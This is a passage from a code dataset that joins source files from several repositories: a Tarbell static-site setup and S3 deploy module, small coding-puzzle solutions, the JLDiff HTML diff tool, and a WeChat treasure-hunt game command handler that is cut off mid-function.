elif additional_aws_access_key_id == "":
continue
# Ask for a secret key, if it differs from default
additional_secret_key_prompt = "\nPlease specify an AWS Secret Access Key for this bucket:"
if default_aws_secret_access_key:
additional_secret_key_prompt += ' [%s] ' % default_aws_secret_access_key
else:
additional_secret_key_prompt += ' (leave blank to skip adding bucket) '
additional_aws_secret_access_key = raw_input(
additional_secret_key_prompt)
if additional_aws_secret_access_key == "" and default_aws_secret_access_key:
additional_aws_secret_access_key = default_aws_secret_access_key
elif additional_aws_secret_access_key == "":
continue
ret['s3_credentials'][additional_s3_bucket] = {
'access_key_id': additional_aws_access_key_id,
'secret_access_key': additional_aws_secret_access_key,
}
puts("\n- Done configuring Amazon S3.")
return ret
def _setup_tarbell_project_path(settings, path, prompt=True):
"""
Prompt user to set up project path.
"""
default_path = os.path.expanduser(os.path.join("~", "tarbell"))
projects_path = raw_input("\nWhat is your Tarbell projects path? [Default: {0}, 'none' to skip] ".format(default_path))
if projects_path == "":
projects_path = default_path
if projects_path.lower() == 'none':
puts("\n- Not creating projects directory.")
return {}
if os.path.isdir(projects_path):
puts("\nDirectory exists!")
else:
puts("\nDirectory does not exist.")
make = raw_input("\nWould you like to create it? [Y/n] ")
if make.lower() == "y" or not make:
os.makedirs(projects_path)
puts("\nProjects path is {0}".format(projects_path))
puts("\n- Done setting up projects path.")
return {"projects_path": projects_path}
def _setup_default_templates(settings, path, prompt=True):
"""
Add some (hardcoded) default templates.
"""
project_templates = [{
"name": "Basic Bootstrap 3 template",
"url": "https://github.com/tarbell-project/tarbell-template",
}, {
"name": "Searchable map template",
"url": "https://github.com/tarbell-project/tarbell-map-template",
}, {
"name": "Tarbell template walkthrough",
"url": "https://github.com/tarbell-project/tarbell-tutorial-template",
}]
for project in project_templates:
puts("+ Adding {0} ({1})".format(project["name"], project["url"]))
puts("\n- Done configuring project templates.")
return {"project_templates": project_templates}
def _backup(path, filename):
"""
Backup a file.
"""
target = os.path.join(path, filename)
if os.path.isfile(target):
dt = datetime.now()
new_filename = ".{0}.{1}.{2}".format(
filename, dt.isoformat(), "backup"
)
destination = os.path.join(path, new_filename)
puts("- Backing up {0} to {1}".format(
colored.cyan(target),
colored.cyan(destination)
))
shutil.copy(target, destination)
```
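Below, a minimal standalone sketch of the backup-naming scheme `_backup` uses above; the settings path and filename here are hypothetical:

```python
import os
import shutil
from datetime import datetime

def backup_name(filename):
    # Mirrors _backup's naming: a hidden file tagged with an ISO timestamp.
    return ".{0}.{1}.{2}".format(filename, datetime.now().isoformat(), "backup")

# Hypothetical usage: back up ~/.tarbell/settings.yaml before rewriting it.
path = os.path.expanduser(os.path.join("~", ".tarbell"))
target = os.path.join(path, "settings.yaml")
if os.path.isfile(target):
    shutil.copy(target, os.path.join(path, backup_name("settings.yaml")))
```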
#### File: tarbell/tarbell/errors.py
```python
import string
class MergedCellError(Exception):
def __init__(self, sheetname, ranges):
"""
Translate merged cells to human readable ranges.
"""
self.sheetname = sheetname
self.ranges = ranges
self.bad_ranges = []
letters = string.ascii_lowercase  # string.lowercase was removed in Python 3
for cell_range in self.ranges:  # avoid shadowing the built-in range
row1, row2, col1, col2 = cell_range
col1 = letters[col1]
col2 = letters[col2 - 1]
row1 = row1 + 1
self.bad_ranges.append(
"{0}{1}:{2}{3}".format(col1, row1, col2, row2))
def __str__(self):
return ("Merged cells found in worksheet '{0}' in ranges {1}"
.format(self.sheetname, ", ".join(self.bad_ranges)))
```
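A quick illustration of how `MergedCellError` renders ranges; the sheet name and range values are made up:

```python
# Assuming the MergedCellError class above is importable:
err = MergedCellError("Sheet1", [(0, 2, 0, 2)])  # rows 0-2, cols 0-2 merged
print(err)
# -> Merged cells found in worksheet 'Sheet1' in ranges a1:b2
```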
#### File: tarbell/tarbell/s3.py
```python
import hashlib
import gzip
import mimetypes
import os
import shutil
import sys
import tempfile
from boto.exception import S3ResponseError
from boto.s3.connection import S3Connection, OrdinaryCallingFormat
from boto.s3.key import Key
from clint.textui import puts
from .utils import show_error
GZIP_TIMESTAMP = 326073600 # Timestamp of Eads' birthday
class S3Url(str):
"""
Encapsulates an S3 URL
"""
def __new__(self, content):
# Parse out the bucket root and path. Note that the first argument of
# __new__ is really the class, so root and path become class attributes.
if not content.endswith("/"):
content = "{0}/".format(content)
if content.startswith("s3://"):
content = content[5:]
self.root, self.path = content.split("/", 1)
return str.__new__(self, content.rstrip("/"))
class S3Sync:
"""
Encapsulate syncing a directory with S3
"""
def __init__(self, directory, bucket, access_key_id, secret_access_key, force=False):
if '.' in bucket:
connection = S3Connection(access_key_id, secret_access_key, calling_format=OrdinaryCallingFormat())
else:
connection = S3Connection(access_key_id, secret_access_key)
self.force = force
self.bucket = bucket
self.directory = directory.rstrip('/')
try:
self.connection = connection.get_bucket(bucket.root)
except S3ResponseError as e:
show_error("S3 error! See below:\n")
puts("{0}\n".format(str(e)))
sys.exit()
def deploy_to_s3(self):
"""
Deploy a directory to an s3 bucket.
"""
self.tempdir = tempfile.mkdtemp('s3deploy')
for keyname, absolute_path in self.find_file_paths():
self.s3_upload(keyname, absolute_path)
shutil.rmtree(self.tempdir, True)
return True
def s3_upload(self, keyname, absolute_path):
"""
Upload a file to s3
"""
mimetype = mimetypes.guess_type(absolute_path)
options = {'Content-Type': mimetype[0]}
if mimetype[0] is not None and mimetype[0].startswith('text/'):
# gzip text files into the temp dir before uploading
# (the fixed timestamp keeps the gzip output deterministic)
options['Content-Encoding'] = 'gzip'
key_parts = keyname.split('/')
filename = key_parts.pop()
temp_path = os.path.join(self.tempdir, filename)
with open(absolute_path, 'rb') as upload, gzip.GzipFile(temp_path, 'wb', 9, None, GZIP_TIMESTAMP) as gzfile:
gzfile.write(upload.read())
absolute_path = temp_path
with open(absolute_path, 'rb') as f:
etag = '"{0}"'.format(hashlib.md5(f.read()).hexdigest())  # avoid shadowing the built-in hash
key = "{0}/{1}".format(self.bucket.path, keyname)
existing = self.connection.get_key(key)
if self.force or not existing or (existing.etag != etag):
k = Key(self.connection)
k.key = key
puts("+ Uploading {0}/{1}".format(self.bucket, keyname))
k.set_contents_from_filename(absolute_path, options, policy='public-read')
else:
puts("- Skipping {0}/{1}, files match".format(self.bucket, keyname))
def find_file_paths(self):
"""
A generator function that recursively finds all files in the upload directory.
"""
paths = []
for root, dirs, files in os.walk(self.directory, topdown=True):
rel_path = os.path.relpath(root, self.directory)
for f in files:
if rel_path == '.':
path = (f, os.path.join(root, f))
else:
path = (os.path.join(rel_path, f), os.path.join(root, f))
paths.append(path)
return paths
```
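A hedged usage sketch of the `S3Url` and `S3Sync` classes above; the bucket, directory, and credentials are placeholders, and real AWS credentials plus `boto` are needed to actually run it:

```python
# Deploy a built site directory to S3 (all values below are example data).
bucket = S3Url("s3://apps.example.com/my-project")
sync = S3Sync(
    directory="/path/to/_site",
    bucket=bucket,
    access_key_id="YOUR_ACCESS_KEY_ID",
    secret_access_key="YOUR_SECRET_ACCESS_KEY",
)
sync.deploy_to_s3()
```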
#### File: tarbell/tests/test_barebones.py
```python
import filecmp
import os
from tarbell.app import EXCLUDES, TarbellSite
TESTS_DIR = os.path.dirname(__file__)
PATH = os.path.realpath(os.path.join(TESTS_DIR, 'examples/barebones'))
BUILT = os.path.join(PATH, '_site')
PROJECT_NAME = "barebones"
def test_get_site():
site = TarbellSite(PATH)
assert os.path.realpath(site.path) == os.path.realpath(PATH)
assert site.project.name == PROJECT_NAME
def test_default_excludes():
"Ensure a basic set of excluded files"
site = TarbellSite(PATH)
assert set(site.project.EXCLUDES) == set(EXCLUDES)
```
#### File: tarbell/tests/test_build_site.py
```python
import filecmp
import os
import pytest
from tarbell.app import TarbellSite
EXAMPLES_DIR = os.path.realpath(os.path.join(os.path.dirname(__file__), 'examples'))
TEST_SITES = [os.path.join(EXAMPLES_DIR, d) for d in os.listdir(EXAMPLES_DIR)]
@pytest.mark.parametrize('path', TEST_SITES)
def test_site(path, tmpdir):
"""
Test that sites in the examples/ directory build correctly
"""
site = TarbellSite(path)
assert os.path.realpath(site.path) == os.path.realpath(path)
# build the site
site.generate_static_site(str(tmpdir))
# compare directories
built = os.path.join(path, '_site')
comp = filecmp.dircmp(built, str(tmpdir))
assert set(comp.same_files) == set(os.listdir(built))
```
|
{
"source": "jeduardo/packages-formula",
"score": 2
}
|
#### File: packages-absent/testinfra/test_packages_absent.py
```python
import pytest
@pytest.mark.parametrize("name,sample_file", [
("nano", "/bin/nano")
])
def test_package_is_not_installed(host, name, sample_file):
assert not host.exists(sample_file)
```
|
{
"source": "jedubz/daily-coding-problem",
"score": 4
}
|
#### File: problems_0_99/problem_1/product.py
```python
input1 = [1, 2, 3, 4, 5]
expected1 = [120, 60, 40, 30, 24]
input2 = [3, 2, 1]
expected2 = [2, 3, 6]
def recurs(newInput):
if newInput:
n = newInput.pop()
return n * recurs(newInput)
else:
return 1
def product(values):
# entry i of the result is the product of all values except values[i]
# (renamed from `input` to avoid shadowing the built-in)
result = []
for i in range(len(values)):
others = list(values)
others.pop(i)
result.append(recurs(others))
return result
actual1 = product(input1)
actual2 = product(input2)
print(actual1 == expected1)
print(actual2 == expected2)
```
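The `product` above is O(n²) because it rebuilds and reduces the list for every index. A standard linear-time alternative (an addition for illustration, not part of this repo) accumulates prefix and suffix products:

```python
def product_linear(values):
    n = len(values)
    result = [1] * n
    # result[i] starts as the product of everything left of i...
    prefix = 1
    for i in range(n):
        result[i] = prefix
        prefix *= values[i]
    # ...then is multiplied by the product of everything right of i.
    suffix = 1
    for i in range(n - 1, -1, -1):
        result[i] *= suffix
        suffix *= values[i]
    return result

print(product_linear([1, 2, 3, 4, 5]) == [120, 60, 40, 30, 24])  # True
```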
#### File: problems_0_99/problem_3/missing_posint.py
```python
testcase1 = [3, 4, -1, 1]
testcase2 = [1, 2, 0]
testcase3 = [3, 5, 6]
expected1 = 2
expected2 = 3
expected3 = 1
def find_missing_pos_int(arr):
# Walk the distinct values in ascending order; the first gap among the
# positives is the answer. (A single pass over an unsorted list misses
# cases such as [1, 3, 2].)
lowest_pos_int = 1
for i in sorted(set(arr)):
if int_is_pos(i) and i == lowest_pos_int:
lowest_pos_int = lowest_pos_int + 1
return lowest_pos_int
def int_is_pos(number):
return number > 0
actual1 = find_missing_pos_int(testcase1)
actual2 = find_missing_pos_int(testcase2)
actual3 = find_missing_pos_int(testcase3)
print("Actual1: " + str(actual1))
print("Actual2: " + str(actual2))
print("Actual3: " + str(actual3))
assert actual1 == expected1
print("Passed")
assert actual2 == expected2
print("Passed")
assert actual3 == expected3
print("Passed")
```
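A set-based variant (again an addition, not the repo's code) that runs in O(n) expected time and handles unsorted input and duplicates directly:

```python
def find_missing_pos_int_set(arr):
    seen = set(arr)
    candidate = 1
    # The answer is at most len(arr) + 1, so this loop is O(n).
    while candidate in seen:
        candidate += 1
    return candidate

assert find_missing_pos_int_set([3, 4, -1, 1]) == 2
assert find_missing_pos_int_set([1, 2, 0]) == 3
assert find_missing_pos_int_set([3, 5, 6]) == 1
```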
|
{
"source": "JEdward7777/JLDiff",
"score": 2
}
|
#### File: JEdward7777/JLDiff/JLDiff.py
```python
from __future__ import with_statement
import sys
import codecs
# cgi.escape was removed in Python 3.8 and the cgi module itself in 3.13,
# so fall back to html.escape when either is missing.
try:
import cgi
cgi_escape = getattr(cgi, "escape", None)
except ImportError:
cgi_escape = None
if cgi_escape is None:
import html
cgi_escape = html.escape
STATE_PASSING_1ST = 0
STATE_PASSING_2ND = 1
STATE_MATCH = 2
class lineCompIndex(object):
__slots__ = ['errorCount', 'previous', 'state', 'content' ]
def __init__( self ):
self.errorCount = 0
self.previous = None
self.state = STATE_PASSING_1ST
self.content = ""
u_intern_dict = {}
def u_intern( value ):
if value in u_intern_dict:
return u_intern_dict[value]
u_intern_dict[value]=value
return value
def main( argv ):
filename1 = None
filename2 = None
output = None
same_size = False
for arg in argv:
if arg.startswith( "-" ):
if arg == "--same_size":
same_size = True
else:
raise Exception( "Unknown arg " + arg )
else:
if not filename1:
filename1 = arg
elif not filename2:
filename2 = arg
elif not output:
output = arg
else:
raise Exception( "Extra argument " + arg )
if not filename1 or not filename2 or not output:
print( "Usage: JLDiff file1 file2 resultFile [--same_size]" )
exit(1)
with codecs.open( filename1, 'r', 'utf-8', errors='ignore' ) as fileHandle1:
with codecs.open( filename2, 'r', 'utf-8', errors='ignore' ) as fileHandle2:
file1 = fileHandle1.read()
file2 = fileHandle2.read()
lastLine = []
thisLine = []
#init the root root
thisIndex = lineCompIndex()
thisIndex.state = STATE_MATCH
thisLine.append( thisIndex )
#init the root top case
columnIndex = 1
for char2 in file2:
thisIndex = lineCompIndex()
thisIndex.previous = thisLine[ columnIndex-1 ]
thisIndex.errorCount = thisIndex.previous.errorCount+1
thisIndex.content = u_intern(char2)
thisIndex.state = STATE_PASSING_2ND
thisLine.append( thisIndex )
columnIndex += 1
for char1 in file1:
lastLine = thisLine
thisLine = []
try:
sys.stdout.write( char1 )
except Exception:
pass
#init the root left case
thisIndex = lineCompIndex()
thisIndex.previous = lastLine[ 0 ]
thisIndex.errorCount = thisIndex.previous.errorCount+1
thisIndex.content = u_intern(char1)
thisIndex.state = STATE_PASSING_1ST
thisLine.append( thisIndex )
columnIndex = 1
for char2 in file2:
thisIndex = lineCompIndex()
if( char2 == char1 ):
thisIndex.previous = lastLine[ columnIndex-1 ]
# To keep from getting spurious single matches,
# see about adding some error in for the first matches.
if thisIndex.previous.state == STATE_MATCH:
thisIndex.errorCount = thisIndex.previous.errorCount
else:
thisIndex.errorCount = thisIndex.previous.errorCount #+ 1
thisIndex.state = STATE_MATCH
thisIndex.content = u_intern(char2)
else:
if lastLine[ columnIndex ].errorCount < thisLine[ columnIndex-1 ].errorCount:
thisIndex.previous = lastLine[ columnIndex ]
thisIndex.content = u_intern(char1)
thisIndex.state = STATE_PASSING_1ST
else:
thisIndex.previous = thisLine[ columnIndex-1 ]
thisIndex.content = u_intern(char2)
thisIndex.state = STATE_PASSING_2ND
thisIndex.errorCount = thisIndex.previous.errorCount+1
thisLine.append( thisIndex )
columnIndex += 1
def printDiffs( nodesToPrint, outputFile ):
isblack = True
isred = False
isgreen = False
def escape( inputStr ):
answer = ""
if inputStr == " ":
answer = " "
elif inputStr == "\t":
answer = " "
else:
answer = cgi_escape( inputStr )
return answer
for nodeToPrint in nodesToPrint:
if nodeToPrint.content == "\n":
outputFile.write( "<br>\n" )
else:
if(nodeToPrint.state == STATE_MATCH):
if not isblack:
outputFile.write( "</span>" )
isblack = True
isred = False
isgreen = False
elif(nodeToPrint.state == STATE_PASSING_2ND ):
if not isred:
if not isblack:
outputFile.write( "</span>" )
outputFile.write( "<span class='new'>" )
isblack = False
isred = True
isgreen = False
else:
if not isgreen:
if not isblack:
outputFile.write( "</span>" )
outputFile.write( "<span class='old'>" )
isblack = False
isred = False
isgreen = True
outputFile.write( escape( nodeToPrint.content ) )
if not isblack:
outputFile.write( "</span>" )
isblack = True
isred = False
isgreen = False
backwardsList = []
currentNode = thisLine[ len( thisLine )-1 ]
while not currentNode is None:
backwardsList.append( currentNode )
currentNode = currentNode.previous
with codecs.open( output, 'w', 'utf-8', errors='ignore' ) as outFile:
outFile.write( "<!DOCTYPE html>\n" )
outFile.write( "<html>\n" )
outFile.write( "<head>\n" )
outFile.write( "<meta charset='utf-8'>\n" )
outFile.write( "<title>diff of " + cgi_escape( filename1 ) + " and " + cgi_escape( filename2 ) + "</title>\n" )
outFile.write( "<style>\n" )
if same_size:
outFile.write( ".new{color:darkgreen}\n" )
outFile.write( ".old{color:red}\n" )
else:
outFile.write( ".new{color:darkgreen;font-size: 25px;}\n" )
outFile.write( ".old{color:red;font-size: 25px;}\n" )
outFile.write( "</style>\n" )
outFile.write( "</head>\n" )
outFile.write( "<body>\n" )
backwardsList.reverse()
printDiffs( backwardsList, outFile )
outFile.write( "</body>\n" )
outFile.write( "</html>\n" )
if __name__ == "__main__":
main(sys.argv[1:])
```
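JLDiff fills an edit-distance-style dynamic-programming table over the two character streams, keeping two explicit rows and linking each cell to its predecessor for the final traceback. As a sanity check of its alignment, the standard library's `difflib` produces comparable opcodes (this snippet is an aside, not part of JLDiff):

```python
import difflib

a, b = "kitten", "sitting"
matcher = difflib.SequenceMatcher(None, a, b)
for op, i1, i2, j1, j2 in matcher.get_opcodes():
    # 'equal' spans correspond to JLDiff's STATE_MATCH runs;
    # 'delete'/'insert' correspond to STATE_PASSING_1ST / STATE_PASSING_2ND.
    print(op, repr(a[i1:i2]), "->", repr(b[j1:j2]))
```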
|
{
"source": "JEdwards27/Dist_Login",
"score": 2
}
|
#### File: Dist_Login/Libraries/output.py
```python
import data_handler
import crypto_handler
def output_results(username, password, group):
print("Username", username)
print("Password", password)
print(" Group", group)
compiled_key = data_handler.read_stored_key(username, group)
print(" CompKey", compiled_key)
compiled_key_fingerprint = crypto_handler.fingerprint_data(compiled_key)
print("KeyPrint", compiled_key_fingerprint)
```
|
{
"source": "jedwin/wechat",
"score": 2
}
|
#### File: wechat/wxcloudrun/ExploerGameHandler.py
```python
from django.core.exceptions import *
from wxcloudrun.common_functions import *
import datetime
from wxcloudrun.models import *
from wxcloudrun.location_game import *
def handle_player_command(app_en_name='', open_id='', game_name='', cmd='', for_text=True):
"""
Handle a single command issued by a player in a given game.
All parameters are strings.
Returns a dict:
{'game_is_valid': true/false,
'game_is_active': true/false,
'player_is_audit': true/false,
'player_info': player_info_dict, the player's basic info (nickname, avatar, etc.)
'player_game_info': player_game_info_dict, the player's save data after this command is processed
'reply_obj': object, the main reply content; a legacy-format replyMsg if for_text==True, otherwise a string
'reply_options': [reply_opt_dict1, reply_opt_dict2], options for the next step plus extra content
'hint_string': string, hint for the current quest, always shown on the front end
'clear_code': string, the game-clear code shown on the front end; empty until the game is cleared
'progress': string, current progress, always shown on the front end
'notify_msg': string, notification shown in green
'error_msg': string, notification shown in red
'app_en_name': string,
'open_id': string,
'quest_trigger': string, used as the page title
'page_type': string, currently 'reward' or 'quest', i.e. the achievement page or the question page
'answer_is_correct': bool, True only when the user submitted an answer and it was correct; False otherwise
}
"""
# Initialize the return dict
ret_dict = dict()
ret_dict['game_is_valid'] = False
ret_dict['game_is_active'] = False
ret_dict['player_is_audit'] = False
ret_dict['player_info'] = dict()
ret_dict['player_game_info'] = dict()
ret_dict['reply_obj'] = ''
ret_dict['reply_options'] = list()
ret_dict['hint_string'] = ''
ret_dict['clear_code'] = ''
ret_dict['progress'] = ''
ret_dict['notify_msg'] = ''
ret_dict['error_msg'] = ''
ret_dict['cur_game_name'] = ''
ret_dict['app_en_name'] = ''
ret_dict['open_id'] = ''
ret_dict['quest_trigger'] = ''
ret_dict['page_type'] = ''
ret_dict['answer_is_correct'] = False
# 为了和文字版统一处理,增加fromUser空变量
fromUser = ''
# 首先获取app信息,my_app
if len(app_en_name) > 0:
try:
my_app = WechatApp.objects.get(en_name=app_en_name)
app_keyword_list = [x.keyword for x in AppKeyword.objects.filter(app=my_app)]
ret_dict['app_en_name'] = app_en_name
except ObjectDoesNotExist:
# en_name not valid
ret_dict['error_msg'] = f'app_en_name:{app_en_name} 不存在'
return ret_dict
else:
# app_en_name not valid
ret_dict['error_msg'] = f'app_en_name is blank'
return ret_dict
# Look up the player object (cur_player) for this openid
if len(open_id) > 0:
try:
cur_player = WechatPlayer.objects.get(app=my_app, open_id=open_id)
except ObjectDoesNotExist:
# 如果这个openid没有在数据库中,则表明不是从微信进入,需要返回错误信息
ret_dict['error_msg'] = '用户id异常,请从公众号进入游戏'
return ret_dict
ret_dict['open_id'] = open_id
else:
# open_id not valid
ret_dict['error_msg'] = f'open_id is blank'
return ret_dict
# If game_name was passed, use it to look up the game;
# if it is empty, fall back to the player's cur_game_name attribute;
# if that is also empty, return a failure message.
if len(game_name) > 0:
cur_game_name = game_name
elif len(cur_player.cur_game_name) > 0:
cur_game_name = cur_player.cur_game_name
else:
# game_name not valid
ret_dict['error_msg'] = f'game_name is blank'
return ret_dict
# Fetch the game object (cur_game)
try:
cur_game = ExploreGame.objects.get(app=my_app, name=cur_game_name)
ret_dict['game_is_valid'] = True
ret_dict['cur_game_name'] = cur_game_name
except ObjectDoesNotExist:
# 如果配置的游戏名称已经不存在,就清空已配置的名称
# 触发词列表置空
cur_player.cur_game_name = ''
cur_player.save()
cur_game = None
ret_dict['error_msg'] = f'游戏{cur_game_name}不存在'
return ret_dict
# Check whether the game is active. If it is, initialize the game-related
# objects: trigger list, the player's save, earned rewards, command history,
# clear code, and auth state.
if cur_game.is_active:
ret_dict['game_is_active'] = True
cur_player_game_dict = get_cur_player_game_dict(player=cur_player, game_name=cur_game_name)
reward_list = cur_player_game_dict.get(FIELD_REWARD_LIST, list())
cmd_dict = cur_player_game_dict.get(FIELD_COMMAND_DICT, dict())
clear_code = cur_player_game_dict.get(FIELD_CLEAR_CODE, '')
player_is_audit = cur_player_game_dict.get(FIELD_IS_AUDIT, False)
wait_status = cur_player_game_dict.get(FIELD_WAIT_STATUS, '')
if len(wait_status) > 0:
try:
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=wait_status)
next_list = cur_quest.get_content_list(type='next')
if len(next_list) > 0:
trigger_list = next_list
trigger_list.append(wait_status)
if len(cur_quest.back_quest) > 0:
trigger_list.append(cur_quest.back_quest)
except ObjectDoesNotExist:
next_list = list()
else:
next_list = list()
if len(next_list) == 0:
trigger_list = [x.quest_trigger for x in ExploreGameQuest.objects.filter(game=cur_game)]
ret_dict['player_is_audit'] = player_is_audit
ret_dict['player_game_info'] = cur_player_game_dict
ret_dict['player_info'] = cur_player.user_info
ret_dict['clear_code'] = clear_code
ret_dict['progress'] = cur_game.check_progress(reward_list=reward_list)
else:
# 如果游戏不是激活状态
ret_dict['error_msg'] = f'游戏{cur_game_name}未启动或已过活动时间'
return ret_dict
# The player must also have passed the auth check
if player_is_audit:
# Start processing the cmd string
if len(cmd) > 0:
content = cmd
if content in trigger_list:
# 如果用户尝试触发新任务
ret_dict['answer_is_correct'] = True
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=content)
prequire_list = cur_quest.get_content_list(type='prequire')
if set(prequire_list).issubset(set(reward_list)) or len(prequire_list) == 0:
# 如果这个Quest没有前置要求,或前置要求都达到了
if cur_quest.reward_id in reward_list:
# 如果玩家已经通关这个任务,就显示对应的成就页面
ret_dict = set_reward(quest=cur_quest, ret_dict=ret_dict)
else:
# 如果玩家还没通过这个任务,就显示问题页面
wait_status = content
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = set_quest(cur_game=cur_game, trigger=content, open_id=open_id,
ret_dict=ret_dict, reward_list=reward_list)
else:
# 前置要求还没做全
done_id_list = set(reward_list).intersection(set(prequire_list))
all_quest = ExploreGameQuest.objects.filter(game=cur_game)
done_q_name_list = list()
for q in all_quest:
if q.reward_id in done_id_list:
done_q_name_list.append(q.quest_trigger)
text_content = f'要回答这个问题,需要先完成{len(prequire_list)}个任务,'
text_content += f'而{ret_dict["progress"]}。'
ret_dict['error_msg'] = text_content
elif len(wait_status) > 0: # 如果用户已经处于等待输入状态
# 用户已处于某个Quest中,等待输入答案
if wait_status in trigger_list:
# 如果用户已经处于某个quest的任务中
try:
cur_quest = ExploreGameQuest.objects.get(game=cur_game, quest_trigger=wait_status)
answer_list = cur_quest.get_content_list(type='answer')
next_list = cur_quest.get_content_list(type='next')
cmd_list = cmd_dict.get(wait_status, list())
except ObjectDoesNotExist:
# 玩家等待状态设置错误,可能是游戏配置已更改
# 清空等待状态,将answer_list置为空列表
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
answer_list = list()
cur_quest = None
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
text_content = f'任务已取消,请重新开始另一个任务'
ret_dict['error_msg'] = text_content
return ret_dict
if content in answer_list:
# 答对了当前问题
reward_id = cur_quest.reward_id
ret_dict['answer_is_correct'] = True
# 如果玩家是新获得的奖励,就增加1个步数,保存奖励记录
# 如果玩家之前已经获得过奖励,就忽略
if reward_id > 0 and reward_id not in reward_list:
cmd_list.append(content)
cmd_dict[wait_status] = cmd_list
reward_list.append(reward_id)
cur_player_game_dict[FIELD_REWARD_LIST] = reward_list
cur_player_game_dict[FIELD_COMMAND_DICT] = cmd_dict
cur_player.game_hist[cur_game_name] = cur_player_game_dict
# ret_dict['notify_msg'] = cur_quest.reward
if len(next_list) == 0: # 没有下一步,即简单的游戏模式
# 重置玩家当前等待状态,并保存
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
# 确认玩家是否已通关
clear_requirement_list = cur_game.get_content_list()
if set(clear_requirement_list).issubset(set(reward_list)):
# 玩家已达到通关要求
clear_code = cur_player.hash_with_game(cur_game_name)
cur_player_game_dict[FIELD_CLEAR_CODE] = clear_code
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
text_content = f'{cur_game.clear_notice}'
text_content += '\n'
text_content += f'您的通关密码是:{clear_code}'
ret_dict['notify_msg'] = text_content
ret_dict['clear_code'] = clear_code
else:
# 玩家还没通关
replyMsg = cur_quest.reply_msg(type='reward', toUser=open_id, fromUser=fromUser,
for_text=for_text)
ret_dict['reply_obj'] = replyMsg
# 重置游戏界面
# ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
# 进入显示成就页面
ret_dict = set_reward(quest=cur_quest, ret_dict=ret_dict)
else: # 有next_list,就生成下一步的页面
ret_dict['answer_is_correct'] = True
wait_status = next_list[0]
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = set_quest(cur_game=cur_game, open_id=open_id, ret_dict=ret_dict,
reward_list=reward_list)
else:
# 输入了不相关的内容
cmd_list.append(content)
cmd_dict[wait_status] = cmd_list
cur_player_game_dict[FIELD_COMMAND_DICT] = cmd_dict
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
my_error_auto_replys = list(ErrorAutoReply.objects.filter(is_active=True))
ret_dict = set_quest(cur_game=cur_game, trigger=wait_status,
ret_dict=ret_dict, open_id=open_id, reward_list=reward_list)
if len(my_error_auto_replys) > 0:
choose_reply = sample(my_error_auto_replys, 1)[0]
ret_dict['error_msg'] = choose_reply.reply_msg(toUser=open_id, fromUser=fromUser,
for_text=for_text)
else:
ret_dict['error_msg'] = f'{error_reply_default}'
elif wait_status == WAITING_FOR_PASSWORD:
# 如果用户已经完成鉴权,但状态是等待输入密码,就可能人为修改了鉴权状态,先清空等待状态
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
else: # 如果cmd为空,就显示游戏的初始化内容
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
else:
# user is not audit
# 等待用户输入密码
content = cmd
if wait_status == WAITING_FOR_PASSWORD:
# 玩家正在输入密码
if len(content) > 0:
result = auth_user(game=cur_game, password=content, user_id=open_id)
if result:
player_is_audit = True
wait_status = ''
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player_game_dict[FIELD_IS_AUDIT] = player_is_audit
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict = new_game(cur_game=cur_game, reward_list=reward_list, ret_dict=ret_dict)
ret_dict['player_is_audit'] = True
ret_dict['answer_is_correct'] = True
ret_dict['cmd'] = ''
else:
# 没有输对密码
ret_dict['error_msg'] = AUDIT_FAILED
ret_dict['page_type'] = 'password' # 因为需要输入密码
else: # cmd为空,再次显示请输入密码
ret_dict['error_msg'] = ASK_FOR_PASSWORD
ret_dict['page_type'] = 'password' # 因为需要输入密码
else:
wait_status = WAITING_FOR_PASSWORD
cur_player_game_dict[FIELD_WAIT_STATUS] = wait_status
cur_player.game_hist[cur_game_name] = cur_player_game_dict
cur_player.save()
ret_dict['error_msg'] = ASK_FOR_PASSWORD
ret_dict['page_type'] = 'password' # 因为需要输入密码
return ret_dict
def get_cur_player_game_dict(player, game_name):
"""
Return the player's saved-game dict for the given game.
"""
player_game_dict = player.game_hist # json object
# player_game_dict should be like this
# {'cur_game_name': {setting1: xxx, setting2: xxx}}
if len(game_name) > 0:
# 如果游戏名不为空
if not player_game_dict:
# 如果这个玩家还没有游戏存档,就用输入的游戏名初始化一个
cur_player_game_dict = {FIELD_IS_AUDIT: False,
FIELD_COMMAND_DICT: dict(),
FIELD_CLEAR_CODE: '',
FIELD_REWARD_LIST: list()}
player_game_dict = {game_name: cur_player_game_dict}
player.game_hist = player_game_dict
player.save()
else:
# 如果玩家已经有游戏存档
cur_player_game_dict = player_game_dict.get(game_name, dict())
else:
# 如果输入的游戏名为空,返回空字典
cur_player_game_dict = dict()
return cur_player_game_dict
def set_quest_option(my_quest, reward_list):
# Determine a quest's state (cleared, available, or locked) and return its display option.
# Return None when the quest should not be shown at all.
prequire_list = my_quest.get_content_list(type='prequire')
if my_quest.reward_id in reward_list:
# 如果这个Quest已经通关
return {'trigger': my_quest.quest_trigger, 'comment': my_quest.comment_when_clear,
'enable': True, 'style': OPTION_ENABLE}
elif set(prequire_list).issubset(set(reward_list)) or len(prequire_list) == 0:
# 如果这个Quest没有前置要求,或前置要求都达到了
